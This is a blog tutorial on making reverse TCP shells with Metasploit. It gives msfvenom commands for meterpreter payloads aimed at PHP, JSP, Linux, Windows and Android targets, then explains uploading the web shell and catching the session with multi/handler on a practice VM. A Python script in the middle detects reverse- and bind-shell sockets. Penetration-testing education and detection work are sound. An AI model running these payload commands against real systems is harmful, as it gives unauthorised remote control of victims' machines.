Mar 13, 2022

Reverse TCP shell with Metasploit

Metasploit is an awesome tool. It can be used to automate the exploitation process, generate shellcode, act as a listener, etc. I hope to start a tutorial series on the Metasploit framework and its partner programs. So in today's tutorial, we are going to see how we can build a reverse TCP shell with Metasploit. As an example, we use msfvenom to create a web shell in PHP and use Metasploit to get the session. It creates a reverse TCP connection to our machine.

Reverse TCP vs Bind TCP shell

First of all, let's clarify what a reverse TCP shell is, what a bind shell is, and how they work. In both situations there is an attacker machine and a victim server. In a reverse shell, the connection is opened from the victim server to the attacker's machine. We set up a listener on the attacker's machine, and it waits for an incoming connection from the victim. When it receives the TCP connection, it serves as a shell to access the victim server.

A bind shell works in a different way. The payload binds a shell to a specific port on the victim server, so the attacker uses his machine to connect to the victim server.
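The two patterns above leave opposite traces on the victim: a reverse shell shows up as an outbound established connection owned by the web-server process, a bind shell as an extra listening socket owned by it. The following added example (my own code, not part of the original post) parses `ss -tanp` style output (constructed sample below; the process names and expected ports are assumptions) and flags both patterns:

```python
import re

# Processes that serve HTTP and should not open other sockets (assumption).
WEB_PROCS = {"php-fpm", "apache2", "httpd", "nginx"}
# Ports those processes are expected to listen on (assumption for this example).
EXPECTED_PORTS = {80, 443, 9000}
# Matches the users:(("proc",pid=N,fd=M)) field printed by `ss -p`.
USERS_RE = re.compile(r'users:\(\("([^"]+)",pid=(\d+)')

def port_of(addr):
    """'10.0.0.5:46210' -> 46210; '0.0.0.0:*' -> None."""
    p = addr.rsplit(":", 1)[1]
    return int(p) if p.isdigit() else None

def is_loopback(addr):
    return addr.startswith("127.") or addr.startswith("[::1]")

def find_shell_patterns(ss_output):
    """Return (kind, proc, pid, local, peer) for each suspicious web-process socket."""
    hits = []
    for line in ss_output.splitlines():
        parts = line.split()
        m = USERS_RE.search(line)
        if len(parts) < 5 or parts[0] == "State" or not m:
            continue  # header line or no owning process shown
        state, local, peer = parts[0], parts[3], parts[4]
        proc, pid = m.group(1), int(m.group(2))
        if proc not in WEB_PROCS:
            continue
        if state == "LISTEN" and port_of(local) not in EXPECTED_PORTS:
            # A web process listening on an unexpected port: bind-shell pattern.
            hits.append(("bind-shell", proc, pid, local, peer))
        elif (state == "ESTAB" and port_of(local) not in EXPECTED_PORTS
              and not is_loopback(peer)):
            # Local port is ephemeral, so the web process initiated the connection:
            # reverse-shell pattern. Real backends (DB, cache) need an allowlist here.
            hits.append(("reverse-shell", proc, pid, local, peer))
    return hits

# Constructed sample in the layout of `ss -tanp`; addresses are documentation ranges.
SAMPLE = """\
State  Recv-Q Send-Q Local Address:Port   Peer Address:Port Process
LISTEN 0      511    0.0.0.0:80           0.0.0.0:*         users:(("apache2",pid=812,fd=4))
ESTAB  0      0      10.0.0.5:80          203.0.113.7:51022 users:(("apache2",pid=815,fd=12))
ESTAB  0      0      10.0.0.5:46210       198.51.100.9:555  users:(("apache2",pid=815,fd=13))
LISTEN 0      1      0.0.0.0:4444         0.0.0.0:*         users:(("php-fpm",pid=901,fd=5))
ESTAB  0      0      127.0.0.1:38844      127.0.0.1:3306    users:(("php-fpm",pid=903,fd=9))
"""

if __name__ == "__main__":
    for hit in find_shell_patterns(SAMPLE):
        print(*hit)
```

Run against live output with `ss -tanp` as root; the inbound HTTP connection on port 80 and the loopback database connection are correctly ignored, while the outbound connection to port 555 and the listener on 4444 are reported.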

Generating the exploit using Msfvenom

First, we use msfvenom to create our shell. This tool ships with the Metasploit framework and can be used to generate payloads for multiple platforms such as Android, Windows, PHP servers, etc.

The following is the syntax for generating a payload with msfvenom.

msfvenom -p php/meterpreter_reverse_tcp -o shell.php LHOST= LPORT=555

Here we have supplied several arguments to the msfvenom tool. Let's see what they do. At the moment we don't use any encoding; we can use encoders later.

Here -p stands for payload. It tells msfvenom which payload we want to use; here we used meterpreter as the payload. You can get the list of available payloads with the command msfvenom --list payloads. In the above example, we used a PHP payload since we are going to build a web shell.

-o sets the output file. We have specified shell.php, so our output will be saved as shell.php.

In the following list we can see some payload types we use often.

Web servers

Most web servers run PHP as their server-side language. We can build a PHP web shell with msfvenom by using "php/meterpreter_reverse_tcp" as the payload. Since we are uploading it to a PHP server, the extension of the shell should be ".php".

msfvenom -p php/meterpreter_reverse_tcp -o shell.php LHOST= LPORT=555

What about a JSP server? We can build a web shell as a JSP file and try to upload it. So we use "java/jsp_shell_reverse_tcp" as our payload and the output file extension should be ".jsp".

msfvenom -p java/jsp_shell_reverse_tcp -o shell.jsp LHOST= LPORT=555

Linux platforms

If we want to attack a Linux server we can use "linux/x86/meterpreter/reverse_tcp" as our payload. We also use ".elf" as the output file extension.

msfvenom -p linux/x86/meterpreter/reverse_tcp -o shell.elf LHOST= LPORT=555

Windows machines

For Windows, we can use meterpreter as the payload, so we select "windows/meterpreter/reverse_tcp". As you know, the extension should be ".exe".

msfvenom -p windows/meterpreter/reverse_tcp -o shell.exe LHOST= LPORT=555

Android devices

We know that Android is the world's most popular mobile operating system. Metasploit has various payloads for Android. Commonly we use "android/meterpreter_reverse_tcp" to attack Android devices. The output file extension should be ".apk".

msfvenom -p android/meterpreter_reverse_tcp -o shell.apk LHOST= LPORT=555

LHOST is the IP of the attacker machine. It should be our public IP, because a reverse shell connects from the victim machine back to our machine.

LPORT is any open port on our machine.

You can see we have generated our shell as a PHP file. Now we can use any method like RFI, FUV etc. to upload it to a server. I'll use the Web for Pentester vulnerable machine. Before we execute our shell we need to set up a listener to catch our connection.

Now we start the Metasploit framework. There are several ways to use Metasploit, such as msfcli, the msfweb interface, Armitage, msfconsole, etc. Most of the time we use msfconsole for this.

Yes, a beautiful interface. This is an interactive shell and we can use it easily. First, we need to set up a handler for our connection. The handler is responsible for handling reverse connections. Here we have used multi/handler. You can select it with the use command.

Now we have to set some extra options. At any time in msfconsole you can find out which options you need to set by entering the command show options.

In the above screenshot, we can see we need to set LHOST and LPORT. Let's set them. Both of them are the same as what we used when generating our shell.

OK, now it is time to attack. We use the command run to start the process.

It is waiting for an incoming connection. Now we can execute our shell on a web server.

Yes. It worked. We got our meterpreter shell. Now we can do many things. I'll post another tutorial on meterpreter. Till then you can see what to do with the command help. :-)


Thilan Dissanayaka

Hi, I'm Thilan from Sri Lanka. An undergraduate Engineering student of University of Ruhuna. I love to explore things about CS, hacking, reverse engineering etc.